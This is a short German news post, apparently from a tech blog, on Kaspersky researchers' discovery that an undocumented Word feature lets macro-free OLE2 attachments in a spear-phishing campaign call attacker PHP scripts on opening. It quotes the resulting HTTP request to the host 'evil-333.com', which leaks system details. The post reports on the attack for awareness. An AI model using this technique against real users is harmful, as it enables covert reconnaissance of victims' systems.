Undokumentiertes Word-Features für Angriffe benutzt

Sicherheitsforscher der Kaspersky-Labs haben eine undokumentierte Word-Funktion gefunden, die für Malware-Angriffe ausgenutzt wird.

Vor einiger Zeit analysierte die Sicherheitsforscher bestimmt Spam-Mails, die im Rahmen einer Spear-Phishing-Welle (Freakyshelly) mit Word-Dokumenten verteilt wurden. Die Word-Dokumente im Anhang waren im OLE2-Format erstellt, enthielten jedoch keine Makros, Exploits oder andere aktive Inhalte.

Die Forscher wunderten sich, was die Kriminellen mit einer solchen Datei im Schild führten. Eine genaue Untersuchung des Word-Dokumentinhalts ergab dann, dass die Datei mehrere Links zu PHP-Skripten enthielten, die sich auf Webressourcen von Drittanbietern befanden.

Als die Sicherheitsforscher versuchten, diese Dateien in Microsoft Word zu öffnen, stellten sie fest, dass Word einen der Links adressierte. Daraufhin erhielten die Angreifer Informationen über die auf dem Computer installierte Software.

GET HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive

Irgendwie schienen die Angreifer interessiert zu sein, Informationen über das betreffende System, auf dem das Dokument in Word geladen wurde, zu erhalten. Die Sicherheitsforscher beschlossen, das Dokument näher zu analysieren.

Die Kurzfassung: Nach der Analyse stellten sie fest, dass Word eine undokumentierte Funktion besitzt, über die sich beim simplen Öffnen des Word-Dokuments Links zu schädlichen externen PHP-Funktionen aufrufen ließen. Über diese PHP-Funktionen können Informationen über das System abgerufen werden. OpenOffice und LibreOffice besitzen diese Funktionalität dagegen nicht. Details lassen sich in diesem englischsprachigen Blog-Beitrag abrufen. Danke an Leon für den Tipp.